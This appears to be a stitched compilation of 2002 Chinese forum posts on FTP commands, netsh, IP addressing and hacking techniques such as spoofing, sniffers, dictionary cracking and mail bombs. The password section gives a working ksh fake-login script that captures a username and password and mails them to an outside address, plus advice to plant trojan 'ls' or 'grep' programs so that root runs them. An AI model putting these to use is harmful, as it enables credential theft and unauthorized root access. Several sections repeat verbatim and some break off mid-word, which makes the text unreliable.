  那么如何应用这些命令提高效率呢?下面我举一个例子,如何利用fttp进行后台

下载,假设你的ISP给你提供了shell并且可以用nohup,你想由
fttp.download.com/pub/internet/下载一个30M的程序aaa.zip具体步骤如下:
  1.用notepad做一个文件如aaa1内容如下
   open ftp.dwonload.com
   user anonymous zyz@cenpok.net
   cd /pub/internet/
   i
   get aaa.zip
   close
   bye
   2.拨号登录到你的ISP上。用telnet 或netterm登录到shell,一般都在你的hom e
子目录里bbs~/
   3.用fttp上传aaa1到ISP服务器你的子目录。
    4. 执行nohup fttp -invd aaa2&
  这样这个进程就被放在ISP服务器的后台进行了,如果你想知道情况如何,可以
more aaa2就可以知道情况如何了。这时你可以断线了或干点别的,估计时间到了
(time约=30M/(33.6K/9)s)拨号上去,more aaa2如果显示成功下载aaa.zip就表示
aaa.zip已经被下载到ISP的服务器上了,你再由ISP的服务器拉回来就相当与点对点
了,记得下载完成后del掉你的文件(aaa.zip),免得浪费ISP资源,它会关掉shell的。


件传输时的交互提示。
   44.proxyftp-cmd在次要控制连接中,执行一条ftp命令,该命令允许连接两个ft p
服务器,以在两个服务器间传输文件。第一条ftp命令必须为open,以首先建立两个服务

器间的连接。
   45.put local-file[remote-file]将本地文件local-file传送至远程主机。

   46.pwd显示远程主机的当前工作目录。
   47.quit同bye,退出ftp会话。
   48.quote arg1,arg2……将参数逐字发至远程ftp服务器,如quote syst。
   49.recv remote-file[local-file]同get。
   50.regetremote-file[local-file]类似于get,但若local-file存在,则从上

次传输中断处续传。
   51.rhelp[cmd-name]请求获得远程主机的帮助。
   52.rstatus[file-name]若未指定文件名,则显示远程主机的状态,否则显示文件

状态。
   53.rename[from][to]更改远程主机文件名。
   54.reset清除回答队列。
   55.restart marker从指定的标志marker处,重新开始get或put,如restart 130。


   56.rmdir dir-name删除远程主机目录。
   57.runique设置文件名唯一性存储,若文件存在,则在原文件后加后缀。
   58.send local-file[remote-file]同put。
   59.sendport设置PORT命令的使用。
   60.site arg1,arg2……将参数作为SITE命令逐字发送至远程ftp主机。
   61.size file-name显示远程主机文件大小,如site idle 7200。
   62.status显示当前ftp状态。
   63.struct[struct-name]将文件传输结构设置为struct-name,缺省时使用
stream结构。
64.sunique将远程主机文件名存储设置为唯一(与runique对应)。
   65.system显示远程主机的操作系统类型。
   66.tenex将文件传输类型设置为TENEX机所需的类型。
   67.tick设置传输时的字节计数器。
   68.trace设置包跟踪。
   69.type[type-name]设置文件传输类型为type-name,缺省为ascii,如
typebinary,设置 二进制传输方式。
   70.umask[newmask]将远程服务器的缺省umask设置为newmask,如umask 3。
   71.useruser-name[password][account]向远程主机表明自己的身份,需要口令

时,必须输入口令,如user anonymous my@email。
   72.verbose同命令行的-v参数,即设置详尽报告方式,ftp服务器的所有响应都将

显示给用户,缺省为on.
   73.?[cmd]同help。
  那么如何应用这些命令提高效率呢?下面我举一个例子,如何利用fttp进行后台

下载,假设你的ISP给你提供了shell并且可以用nohup,你想由
fttp.download.com/pub/internet/下载一个30M的程序aaa.zip具体步骤如下:
  1.用notepad做一个文件如aaa1内容如下
   open ftp.dwonload.com
   user anonymous zyz@cenpok.net
   cd /pub/internet/
   i
   get aaa.zip
   close
   bye
   2.拨号登录到你的ISP上。用telnet 或netterm登录到shell,一般都在你的hom e
子目录里bbs~/

----------------------------------------------------------

作者: 老虎
日期: 2002-11-09
内容:
微软的Windows家族从Windows NT开始跨入了网络操作系统的市场,到现在的Windows 2000可以说网络功能在逐渐的完善,在这个成长过程中Windows融入了很多其他网络操作系统的功能,可以说是借鉴而来的,逐渐形成了一套功能完善的网络操作系统,这也是令SUN等各大公司所感觉到不服的原因,觉得不是微软完全自给研发的东西。不过Windows2000的功能确实是很强大的,它几乎可以象Unix和Linux一样在命令行下做很多的工作。
下面我们看一下Windows上一个可以在命令行下更改ip地址的命令,看过这个命令后大家可能会觉得这个命令很象Unix和Linux的命令,更象Cisco的路由器命令。下面是我在计算机上实际操作的回显,我会加上一些注释:
C:/>ipconfig (首先用ipconfig这个命令看一下更改之前的ip地址)

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.0.250 (本地连接更改之前的ip)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.0.1

PPP adapter 拨号连接:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 211.149.128.147
Subnet Mask . . . . . . . . . . . : 255.255.255.255
Default Gateway . . . . . . . . . : 211.149.128.147

C:/>netsh (然后执行netsh这个命令)
netsh>interface (netsh命令的子命令)
interface>ip (interface命令的子命令)
interface ip>set (interface ip命令的子命令)

下列指令有效:

此上下文中的命令:
set address - 设置指定的接口的 IP 地址或默认网关。
set dns - 设置 DNS 服务器模式和地址。
set wins - 设置 WINS 服务器模式和地址。
interface ip>set address "本地连接" static 192.168.0.2 255.255.255.0 192.168.0.1
1 (设置ip地址)
确定。

(注释:上面一段象不象Cisco的命令。)

interface ip>exit


C:/>ipconfig (更改后再用ipconfig命令看一下ip地址,确认一下是否更改成功)

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.0.2 (更改后的ip说明成功了)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.0.1

PPP adapter 拨号连接:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 211.149.128.147
Subnet Mask . . . . . . . . . . . : 255.255.255.255
Default Gateway . . . . . . . . . : 211.149.128.147

C:/>

netsh这个命令还有好多强大的功能 如下:

C:/>netsh
netsh>?

下列指令有效:

此上下文中的命令:
.. - 移到上一层上下文级。
? - 显示命令列表。
aaaa - 更改到 `aaaa'' 上下文。
abort - 丢弃在脱机模式下所做的更改。
add - 将一个配置项添加到项目列表中。
alias - 添加一个别名
bye - 退出程序。
commit - 提交在脱机模式中所做的更改。
delete - 在项目列表上删除一个配置项目。
dhcp - 更改到 `dhcp'' 上下文。
dump - 显示一个配置脚本。
exec - 运行一个脚本文件。
exit - 退出程序。
help - 显示命令列表。
interface - 更改到 `interface'' 上下文。
offline - 将当前模式设置成脱机。
online - 将当前模式设置成联机。
popd - 从堆栈上打开一个上下文。
pushd - 将当前上下文放推入堆栈。
quit - 退出程序。
ras - 更改到 `ras'' 上下文。
routing - 更改到 `routing'' 上下文。
set - 更新配置设置。
show - 显示信息
unalias - 删除一个别名。
wins - 更改到 `wins'' 上下文。

下列的子上下文可用:
routing interface ras dhcp wins aaaa

若需要命令的更多帮助信息,请键入命令,
后面跟 ?。

. . : 192.168.0.250 (本地连接更改之前的ip)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.0.1

PPP adapter 拨号连接:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 211.149.128.147
Subnet Mask . . . . . . . . . . . : 255.255.255.255
Default Gateway . . . . . . . . . : 211.149.128.147

C:/>netsh (然后执行netsh这个命令)
netsh>interface (netsh命令的子命令)
interface>ip (interface命令的子命令)
interface ip>set (interface ip命令的子命令)

下列指令有效:

此上下文中的命令:
set address - 设置指定的接口的 IP 地址或默认网关。
set dns - 设置 DNS 服务器模式和地址。
set wins - 设置 WINS 服务器模式和地址。
interface ip>set address "本地连接" static 192.168.0.2 255.255.255.0 192.168.0.1
1 (设置ip地址)
确定。

(注释:上面一段象不象Cisco的命令。)

interface ip>exit


C:/>ipconfig (更改后再用ipconfig命令看一下ip地址,确认一下是否更改成功)

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.0.2 (更改后的ip说明成功了)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.0.1

PPP adapter 拨号连接:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 211.149.128.147
Subnet Mask . . . . . . . . . . . : 255.255.255.255
Default Gateway . . . . . . . . . : 211.149.128.147

C:/>

netsh这个命令还有好多强大的功能 如下:

C:/>netsh
netsh>?

下列指令有效:

此上下文中的命令:
.. - 移到上一层上下文级。
? - 显示命令列表。
aaaa - 更改到 `aaaa'' 上下文。
abort - 丢弃在脱机模式下所做的更改。
add - 将一个配置项添加到项目列表中。
alias - 添加一个别名
bye - 退出程序。
comm

----------------------------------------------------------

作者: 老虎
日期: 2002-11-09
内容:
●关于IP地址
在Internet中,每一台主机都有一个唯一的地址,网关常常有不止一个的地址。地址由两部
分组成:网络号和主机号。这种组合是唯一的,以使每一个IP地址表示Internet中的唯一一
台主机。所有的IP地址都是32位长。
IP地址分为五类,平常我们使用的是A类、B类、C类三类地址,它们的表现格式如下:
地址类型 地址形式
A N.H.H.H
B N.N.H.H
C N.N.N.H

其中N指的是网络号,H指的的是主机号。N和H都是大于0小于256的整数。由于A类地址的第一
字节的最高为0,用来表示地址为A类地址,因此A类地址只可以表示1~126个网络,而每个网络
有16,000,000台主机。0和127则有特殊的用处。
B类和C类地址的第一字节的最高两位用于表示地址是B或者C类地址,因此B类地址第一字节的范
围为128~191,C类为192~222。所以B类地址共可以表示64X256(16,382)个网络,每个网络有
64,000台主机。C类有两百多万个网络,而每个网络最多有254台主机。
关于D类地址则称为多路广播地址,即将主机分组,发往一多多路广播地址的信包,同组的主机
都可以收到。
在我们国内,IP地址是由科学院网络中心及其授权的机构来进行分配的。


●何谓“子网”

如果说一个网络里有很多的主机的话,会给管理带来很多困难,并且使网络的设置复杂而容易
出错。在许多情况下,一个A或B类地址的一个网络号,它所对应了如此之多的主机,以至于一
组织或单位常常用不了。另一方面,C类地址一个网络只有254个主机号又显得太少。与是在实际中常常将一个较大的网络
分成几个部分,每个部分称为一个——子网。在外部,这几个子网依然对应一个完整的网络号。划分的办法是
将地址的主机号部分近一步划分成子网号和主机号两个部分。

比如,159.226.xxx.xxx 是一个B类地址。
159.226.21.xxx地址的范围是中科院自动化所,159.226.40.xxx是中国计算所,159.226.41.xxx是国家智能中心。可以看的
出来,这一个B类的地址的第三个字节的一部分变成了子网号了,最后的一个字节才用来表示不同的主机。当然了,这只是一个
例子。有的单位还可能进行近一步的划分,将整个第三个字节和第四个字节的最高几位也作为子网号部分,于是每个子网内最多
只能有64台主机。至于怎么样去观察自己的子网形成,win9x的用户可以运行winipcfg来看了。

●如何认识网络掩码

当在Internet里两台机器通信的时候,需要比较两台主机IP地址,用来判断这两台主机间是否在同一子网内,如果是,那么数据包
就可以直接发给那台主机了,如果不是,那么就得发向网关所在的主机了。这可以通过设置正确的网络掩码来解决。网络掩码就是
对应于网络号和子网号为二进制1,主机号部分为0的串。可以通过ifconfig命令来看一下自己所在的网络号、网络掩码等情况。你可
以从下面这个例子来看:
$ ifconfig -a
loO: flags=849[UP,LOOPBACK,RUNNING,MULTICAST] mtu 8232
inet 127.0.0.1 netmask ffOOOOOO
leO: flags-863[UP,BROADCAST,NOTRAILERS,RUNNING,MULTICAST] mtu 1500
inet 159.226.21.7 ffffffcO broadcast 159.226.21.191
这样就可以看出来,和leO相结合的是一个B类地址,它的IP地址为159.226.21.7,这个B类地址的网络掩码是ffffffcO,也就是第三字
节以及第四字节的最高两个位做了子网号。
有一些IP地址的形式是保留的:
◇IP地址是0.0.0.0,在主机引导时使用,其后不再用。
◇网络号为0的IP地址指同一个网络内的主机。
◇使用正确的网络号,而主机号部分是全l,用于向Internet中具有 该网络号的网络上的所有主机广播。
◇主机号部分是全l的IP地址用于本网段内广播。
◇发向127.0.0.1的地址的数据包,被立刻放到本机的输入队列里,常常用于调试网络软件。

现在您认识了何谓网络掩码了吗?~*~

●怎么理解冒充IP!

我想你在网络之中畅游的时候经常会碰到或听到一些关于盗用IP地址的做攻击之类的事情,那么到底怎么理解IP被“盗”呢?
往往有时候是因为因为IP不够用,或者不法者为了冒充另外的主机去做攻击别人的事,以便起到隐藏自己的作用(我想后者占的比
重比较大些),才去做盗用IP的事情。
其实要冒充不再同一网段的一台主机的IP,你可以使用RAW SOCKET发出IP包,当然了,条件是你必须先拥有超级用户的权限,
但这种形式一般接收不到回应的信息,原因是网关不会将这些数据包转进这个网段内的。这样想想而比较之下,要去冒充与自
己同网段的主机IP就比较简单和方便了。如果你是Windows用户的话改一改IP地址和掩码就可以搞定了,但是UNIX就相对来说就
稍微麻烦一点了,需要编程才可以玩这些(如果成功的话,则可以伪造很多使用IP协议的数据包,从而很大程度的扰乱了网络
的秩序)。
冒充IP所带来的效果则是两台机器同时使用同一个IP,当两方都开着机器的话,系统就会报告IP有冲突了。一般情况下是谁先开
机谁就可以继续使用这个IP。不过要是Windows和UNIX之间“争”的话,那么Windows则必败无疑,哪怕是Windows先开机……

那么如何实现IP冒充呢?其实这个问题在很多站点你都可以找到资料的。这里就不便做进一步解释了。


●IP欺骗攻击的概述!

一个入侵者为了获得访问远程机器的权限,一般都会创建有欺骗性源IP地址的数据包。他们所用这种方法是利用了使用基于IP地
址的认证应用的特点,并可能导致获取非授权访问的权限,甚至对目标机器系统的root访问权限。这种攻击方法即便是在返回包
不能到达入侵者的情况先也可以得逞。
当然了,不是说任何情况下都可以这样做的,主要是看目标机器的配置是否可以如此。比如说:A、支持多内部接口到外部网络的
路由器;B、在内部网络支持子网并有两个网络接口的路由器;C、其代理程序使用源IP地址认证系统的Firewall。这三点说明了
有可能遭受该这种方法攻击的配置情况。
如果说为了方便Internet用户而开设Telnet的话,那么有些服务也是如此,有它好的一面,也有它不安全的一面。IP欺骗攻击在
A、SunRPC & NFS;B、X Windows;C、BSD UNIX“r”命令等如此服务下是较容易受到攻击的。
至于如何检查是否受到此类IP欺骗,方法很多,这里例举一种:查看者可以比较内部网络不同系统间的进程帐号日志,一旦系统受
到了此类攻击的话,就可以在受攻击的系统上得到一个日志项,里面显示对应的远程访问。而在源机器上将没有对应的初始化该远
程访问的记录项(注意:一般入侵者也知晓如何修改此日志项)。
解决IP欺骗的最好方法就是安装过滤路由器,不允许包含内部网络地址的数据包通过该路由器。此外在发出数据包中应该过滤掉源
地址与内部网络地址不同的数据包,这样可以就防止源内部网络的IP欺骗攻击。当然了,什么都不是万能的,不可完全依赖于如此。

●IP层的其它协议!
无论是喜欢网络或者是关注网络安全,那么了解一下IP层的其它协议将是必不可少的。

ICMP(Internet Control Message Protocol,为控制信息协议)是用来传送一些关于网络和主机的控制信息的,如目标主机是不是
可以到达的、路由的重定向、目标主机是否在使用等。常用的"ping"命令就是使用了ICMP协议。Echo Request是ping发向目标主机
的,而Echo reply是由接收的主机发向目标主机的。很多网络攻击工具就是利用了这个协议来实现的。

ARP(Address Resolution Protocol,为地址解析协议)是用来将IP地址映射成相应的主机MAC地址的。在局域网里两台主机通信的
时候,通常需要知道目标主机的物理地址。执行命令arp就可以看到IP地址和物理地址的一些对应关系。

RARP(Reverse Address Resolution Protocol,为反向地址解析协议)是用来将物理地址映射成32位的IP地址。这个协议大多用于
无盘工作站启动时,因为无盘工作站只知道自己的物理地址,还需要利用rarp协议来获得一个IP地址。

●Telnet(远程登录)
Telnet是一种Internet远程终端访问标准。它真实地模仿了远程终端,但是不具备有图形的作用,仅仅是字符界面的访问。Telnet
允许为任何站点上的合法用户提供远程访问权,且不用做特殊的约定。
Telnet并不是一个安全的服务,由于Telnet发送信息的时候都未加密,所以信息很容易被网络监听。仅仅当远程机器及其与本地站点
之间的网络通信安全时,telnet才是相对的安全。这就说明在Internet中Telnet服务是不安全的。现在有一种安全的登陆客户程序,
然而这种程序应用并不多,主要是因为应用这种程序的时候在服务器端要有相应的服务器程序。
除了Telnet之外还有如rlogin、rsh、on等集中程序也可用于远程终端访问和执行程序。在受托的环境中使用这些程序,允许用户远程
登陆而无需再重新输入口令。也就是说远程主机相信登陆的用户所用的主机以对其用户名与密码做过了认证。但是使用这几个r命令是
极其不安全的,很容易受到IP欺骗和名字欺骗以及其它的欺骗技术的攻击。总的来说这样的托管模式不适合在Internet上使用。事实上
因为地址信任非常不安全,所以不要相信自己说来自哪个主机的数据包。
在有Firewall保护的网络中使用rlogin和rsh是可以的,这要看网络内部的安全措施。然而on依靠客户主机程序安全检查,每个人都可
以假冒客户机而回避检查,因此on也是不安全的,即便是在有Firewall保护的局域网中使用也是如此(它能让任何一个用户以其它的用
户名来运行任何一个参数)。现在很多主机已经废除了rexd服务器而使on失效。

●匿名的FTP服务
使用匿名的FTP,用户可以匿名登陆FTP服务器。登陆时需要用户提供完整的E-mail地址做为passwd,其实在很多站点上这个要求形同虚
设,你只要在其中包含有@字节看起来像个E-mail地址就行了,主机不会对口令做任何效验的。
远程所提供FTP服务的主机在处理匿名用户的命令时,一般都会执行一个chroot命令让匿名者进入主机所允许的匿名FTP区域。然而为了
支持匿名FTP和用户FTP,FTP服务器要访问所有文件,也就证明了FTP服务器不是总在chroot环境中运行的。这个环节会让一些愚蠢的管
理员不知所为而未曾理会,很容易被黑客所利用而得到一个匿名FTP用户所不能得到的权限。一般解决这个问题可以通过修改inetd的配
置来替代直接启动FTP服务器,它执行chroot(就类似于chrootuid的程序),然后再启动服务器就可以了。一般情况下,FTP只限于在匿
名用户下访问,匿名用户有其正常的权限,在启动服务器前执行chroot就意味着匿名用户将受到限制。(注意:很多FTP服务器在其建立
匿名FTP系统中只单纯的依赖自己购买FTP服务器的销售说明书中所讲述的来做,而往往这些销售说明中一般都不会谈到漏洞和堵塞漏洞
的方法,这个大意是绝对致命的)。如果说一个匿名用户在FTP服务器的匿名区域获得了一份不应该是匿名用户获得的文件,那么就说明
了可能有内部客户将这个文件放置在匿名的FTP区域了。在很多网络攻击事例中用匿名用户可以阅读到passwd密码档这就是管理员很大错
误表现。


●网络上成员信息查询
可查询成员信息的finger服务:
finger服务可以做到查询在目标主机上有帐号的用户的个人信息,不管这个用户是否当前有在登陆这个主机都可查询。而像finger一般查
询到的这些信息包括登陆名、最近在什么时候什么地方登陆的情况以及用户的简介。
使用finger命令的时候,有三种使用方法:
*finger@host 命令,这将列出的是在目标主机上登陆的每个用户的信息;
*finger user@host命令将会列出主机上用户的信息。
*finger str@host命令 不知道用户名,将提供包括指定的字符串str的任何用户的用户名或者真实名。
其实在很多时候finger将会给黑客提供很多有用的信息,比如用户名和用户的信息之类的,往往给黑客用来跑口令生字典起到很大的帮助。
而现在大多主机已经取消了这个服务,只是有主机内部而阻止了内部网以外的finger请求或仅仅只给一点点信息。
在这里要特别注意的是如果那台主机现在使用的finger程序版本是GNU finger V1.37,那么这个程序将允许finger命令请求者读取系统上的
任何文件,包括……
另一个主机信息查询whois服务:
whois服务类似于finger,但whois所得到的信息是主机、网络、领域以及它们的管理员。在缺省的状态下whois客户机在Internet的网络信息
中心rs.internic.net查询主机,其中包括Internet领域和管理员信息。
有些站点用whois协议来写服务器程序,以便发布用户信息,只是根据主机的自身情况而减少了发出更多的信息,但是往往这一点对黑客而言
都是很重要的。

●名字服务
在Internet中,当使用的主机名与机器使用的数字IP地址之间进行转换,这就是名字服务。在早些时候的Internet中,网络上的每个站点都保
留一个主机列表,其中列有相关的每个机器的名字以及它的IP地址。后来随着主机的增加,再保留这份列表就似乎不太现实了,也很难这样去
做,因为如此以来列表将可能超乎想象的大,再有就是当其它机器改变名字和所对应的地址的时候,主机的列表将不能做到及时的修改。鉴于
如此,INternet就有了域名服务DNS而将其取而代之。
DNS允许每个站点保留自己的主机信息,也可以查询其它站点的信息。DNS本质上不算是一个用户级服务,但是它是FTP、SMTP和telnet的基础,
每个其它服务都可能用到它。我想很多人愿意使用的是名字而不是另人头痛的IP地址。况且许多使用匿名FTP服务器还要进行名字和地址的双重
交换,否则你将不被允许从你的机器登陆到那台FTP服务器的。
一般一个企业网都必须使用和提供名字服务,这样就可以方便的汇入Internet中。但是提供DNS服务有可能会泄露企业网内部机器的信息。在DNS
的数据库文件中往往包含一些主机信息的记录,这些信息如果不加以保护是很容易被外界得到,也很容易给黑客提供到一些可以攻击的有用的信
息(像机器所用的操作系统等信息)。
内部使用DNS和依赖主机名进行认证,将会使主机无法抵抗那些建立伪装DNS服务器的入侵。同时事实也验证了使用IP地址来认证所需的更安全的服
务来防止名字欺骗技术和要认证用户名而不是主机名衡量IP地址不可靠去防止IP欺骗技术也不是完全安全的。

●时间服务
NTP网络时间协议是Internet中的一个服务,它能把主机系统里的时间设置的很准确。在很多情况下,使用不同机器间的时间同步是很重要的(现在
多数DCE中的认证技术就是依赖于时间同步)。有一种回放入侵技术就是记录下一个交互操作,然后反复运行,如果设置了同步时钟就可以防止这种
侵袭了(在记录中做时间标志)。

●协议TCP和UDP
这个层次是对应于OSI参考模型的传输层。在这一层定义了两个协议:一个是TCP协议(即传输控制协议,是个可靠的、面向连接的协议),它允许在
Internet上俩台主机间信息的无差错传输。它将接收到的很长的字节流分段。依次传送给网络层。在目标主机端,TCP接收进程将收到的信息重新装配
成源主机TCP层发送的形式,交给应用层。TCP还进行流量控制,以避免发送过快,使速度较慢的主机不至于因为过多的书记达到而发生拥挤。然而这一
切对用户完全是透明的,普通用户不知道也无需理会这些底层的TCP/IP协议。
在网络传输中,为了保证数据在网络中传输的正确有序,使用了“连接”这个概念。一个TCP连接指的是传输数据之前先要传送三次信号,以便双方为
数据的传述做好准备。三次握手信号传送之后两台主机间才开始传送数据。而发送的每一个数据包都有它的编号接收方的主机每收到一个数据包后都要
向发送的主机发送一个表示已收到的信息。如果发送的信息在信道上出了错或者丢了,那么发送的主机就要重新再发这个数据包了。当发送完结之后两
台主机还要一起释放这个连接。
无连接方式则显得省事一点了。安定能够源主机有数据的时候就发包。它不管发送的数据是不是能到达目标机器,也不管是不是出了错,而目标接收机
器也不会告诉发送的主机是否正确,因此这样的数据传送方式是不可靠的。
两种都有两种的优点和缺点。面向连接的方式是可靠的,但是在通信的进程中传送了许多与数据无关的信息,从而大大降低信道的利用率,这样的面向
连接常用于一些对数据要求可靠性比较高的应用。无连接的当时不可靠,但是它不会传输一些与数据本身无关系的信息,所以速度较高。它常用于一些实
时服务,也可用于对差错不敏感的应用,比如声音、图象等。
● Net
环境文件,可用于控制NetBIOS网络资源,它的命令几乎可以提供所有的NetBIOS网络功能,在这里我只能把它的子命令写出来,
你可以一个个试试了:
accounts、computer、print、send、name、use、user、view、pause、localgroup、share、config、file、continue、
group、help、stop、start、time、session、statistics
…………

● Netstat
环境文件,用于显示当前TCP/IP的连接及状态。你可以输入/?参数的命令,就可以看到一些关于它的命令字符了。如果你想连
续监听正在进行的连接状态的话,你可以利用间隔设定定期、自动刷新显示(例如:netstat -a 5)这样将会在5秒内显示一次
全部的TCP/IP连接状况,包括服务器监听的端口,想停止它按Ctrl+Break键即可。。。。。。

● Ping(子弹啊。。呵呵)
环境文件,可用于发送ICMP回送报文到远程系统,以确定该系统是不是可进一步用于TCP/IP业务(也或者可以看你炸完了后的
结果,~-~)。借助ping检测主机是否还存在工作,它在TCP/IP中常用动词"Did you ping the server?"。输入不带命令的ping
参数你可以看到所描述的命令。简单的ping可以确定不正常对象的工作,但是要对一台远程机子执行ping命令成功的话,你可以
对方物理层、数据链路层和网络层的所有功能是不是正确,通信问题一般发生在更高层。黑客可以将ping用语各种侵害网络的目
的,比如说利用ping通过发送大量的ping(子弹)分组,引起淹没的无效数据。一台机用这种方式不能起到作用,但是有多台机
子同时发送这个命令的话,那么……,这也是一种拒绝服务的攻击,这种攻击能够造成远程系统TCP/IP服务器的崩溃。NT对这种
攻击最为敏感……

● Telnet(远程登录)
这个我就不多说了。但是想提示的就是许多路由器、交换机、防火墙,可以经过它连接到他们的IP地址进行配置,当然了,也可
能被黑客远程配置,黑客可以经过telnet端口连接到IP。也可以经过防火墙阻断内部的telnet连接……

● Tracert
可用于显示两个因特网通信主机间的路由器。由于大多数服务器在它的路由器接口采用有意义的名字,所以通常能够推断出两个
主机间路由的有关情况。。。。。。

● NetAlert
这是一个过时但却常用的东西,不过我还是觉得蛮有用。它可用于监控目标TCP/IP服务的状态。它通过周期介入方式监测。当端
口的状态开或者关的时候,它就会发邮件信息通知你。但是它需要邮件程序Blat1.2或者以上,才能利用邮件功能。。。。。

● NAT(NetBIOS Auditing Tool)
从物理意义上看这个是一种NetBIOS安全审记或者监察工具,实质它的目的可以揭示NetBIOS网络中的安全缺陷,是比较实际的,
现在有很多工具可用与此。它的功能之一就是自动口令检查,对黑客来说……呵呵。用它你可以针对一台NT服务器(好象对
UNIX也可以耶)自动发出攻击,通过多次尝试帐号口令并试图经过NetBIOS进行连接(可以允许远程机器映射驱动器)。
它可以接受帐号列表和口令列表,然后照着出现的次序针对每个帐号和口令进行攻击……
它接受三种命令参数:
-o(指定重定向输出到的记录文件)
-u(指定帐号的文本文件)
-p(指定针对每个帐号的口令的文本文件)
不过现在有很多方法可以阻止NAT的攻击,比如通过重命名Administrator帐号和限制Administrator帐号注册网络等等。。。。。

● Ethernet Sniffer
Sniffer是如今众多的网络闯入的一种途径,计算机在网络中虽然是共享信道,但是它一般只接受信息包中的目的地址与自己网络地
址相符的信息包,而不接受网上传输的发往其它计算机的信息包。除了广播包,这些信息包的头目的地址全部都是0或者1,因此网络
上所有的计算机都可以阅读它。但如果某台机器可以接受所有信息,而不论这些信息是发给谁的,那么这台机器就可以称之为Sniffer。
它可能是网络中的系统管理员用语管理的,但是大多时候是黑客用来入侵机器的。由于帐号与口令在以太网上是以文本格式传输的,
因此,黑客要是有办法控制Sniffer的话,那么网络上的所有机器便处于危险之中。。

● 如何知道自己是否被窃听
窃听可能是通过专用的硬件,也可能是通过运行一些窃听软件执行的。首先要沿着网络的物理布线边走边仔细地检查网络的每一个连
接处。排除硬件上的可能性后,接下来就检测是否有软件窃听。当窃听程序运行的时候,被窃听的计算机的端口会被改成许偌模式,在
这种方式下,才能够窃听到所有的数据包。在SunOs、NetBSD和基于BSD的Unix系统下运行“ifconfig -a”命令,它会告诉你该机器所有
端口的信息,以及他们是否处于危险的许偌模式下。在DEC OSF/1和IRIX等系统中就没有这么方便了,需要你指定检测哪个端口才行的。
在这种情况下可以先运行netstat -r来看看有多少个端口。找到了端口后就用#ifconfig le0来检测……(一般有经验的入侵者会把
"ifconfig"这类命令替换掉,以用来逃避检测。这时你可以用一些工具,像cpm就可以自动检测端口,它运行在SunOS操作系统下。)一些
窃听程序运行时,它会通过访问数据包设备把正在网络上传输的数据包复制一份,存储到网络主机上,形成一个随时间不断增长的文件,
这个文件通常很大,在一个流通量高的网络上,这个文件会更加庞大的。有一种叫Lsof(List Open Files)的工具能够查找出这些不断增长
的文件,并能够找出正在访问数据包设备的程序,在SunOS中这个设备名是/dev/nit。


● 让你了解黑客攻击口令的手段
黑客攻击目标的时候一般都是把破解不同用户的口令作为攻击的开始。他们先用“finger远端主机名”找出主机上的用户帐号,然后
就采用字典穷举法进行攻击。它的原理是根据网络上的用户常常采用的一些E文单词或者自己的姓氏作为口令的实际情况,通过一些程
序自动地从机器字典中取出一个单词作为用户的口令输入给远程的主机尝试进入系统。若是口令错误,就按次序取出下一个单词这样
循环下去,直到找出正确的口令或者字典的单词用完为止(这是一种吐血加上网费用高涨的形式,我不能如此,呵呵)。最典型的字典
代表就是LetMeIn version 2.0了,而我更是喜欢国产的像浩哥的“万用钥匙”和小榕的“黑客字典”等。
要是这些以上的方法不行的话,黑客就会寻找目标机器的薄弱环节和安全方面的漏洞,伺机夺取目标中存放的口令文件passwd或shadow。
现在的Unix系统,用户的基本信息存放在passwd文件中,而所有的口令则经过DES加密法加密后专门存放在一个叫做"shadow"(影子)的
文件中,并且处于严密的保护之下。老版的Unix没有shadow文件,它的口令都放在passwd文件中。要是获得了口令,那么黑客就会用专门
破解DES加密法的程序来破解口令。

● 取得口令文件的简捷方法
1、在能访问对方机器的情况下,把shell命令用ksh运行即可。如下:
clear
stty ignbrk
echo"login:/c"
read logname
stty -echo
echo"password:/C"
read passwd
print"/nlogin incorrect/n"
print $logname $passwd | mail cxterm.bbs@jet.ncic.an.cn
stty 0
stty echo
exit
2、在自己能用的目录里放上“ls”、“grep”之类的程序,希望root能不小心运行到它们(嘿嘿。虽然有些像守株待兔,但是大多时候
你必须这样),root一旦运行,你就可以获得root权限。所以root的PATH里不应当有"."的当前目录。
3、更彻底的方法是根据passwd文件里的密文算口令的明文。
首先你必须取得对方含有密文的passwd文件(如果是有shadow"影子" passwd的机器上需要取得/etc/shadow)。如果得到后你可以借
助一些工具把这个文件还原成可视的密码原文。现在大多数的工具都开始傻瓜化了,所以在这方面操作也就简单了。

● E-mail bomb 电子信箱炸弹
信箱炸弹也是一般黑客常用的攻击手段之一。相对于其它的手段来说mail bomb可谓简单快洁。所谓的信箱炸弹实际是一个地址不详、容量
很大、充满乱码或脏话的恶意邮件,也是垃圾邮件。每个人的邮件信箱都是有限空间的,所以当这种大量的垃圾到了你的信箱之后就会导致
信箱容量不够而把正常的邮件冲掉,同时占用了大量的网络资源,而导致阻塞,使你不能正常运行系统。现在来说,网络你都可以下到很多
这类邮件炸弹的程序,而且有逐渐普及的趋势。嘿嘿。看来我们都得有点准备才行。(我没用过邮件炸弹,因为从理念上来讲我认为邮件炸弹
更像一种懦夫行为。)在邮件炸弹中最为典型的代表就是KaBoom!了,而现在的KaBoom! v3.0版更是比以前增加了很多功能,它可以不间断
的发信,而常用的匿名邮件服务器的地址列表也都做在了程序里了,用户还可以自己增加新的功能。再就是可以为所攻击的人订阅一些大量
邮件讨论组,还多了一些很搞笑的音效。启动这个程序后会出现一个小窗口,分别有3个按钮,它们为Mailbomber(炸人)、Mailing Lists
(为别人订阅邮件组)和Close(退出),操作很简单。但我不希望你因我的这篇文章而去用它。

● 特洛伊木马(Trojan horse)
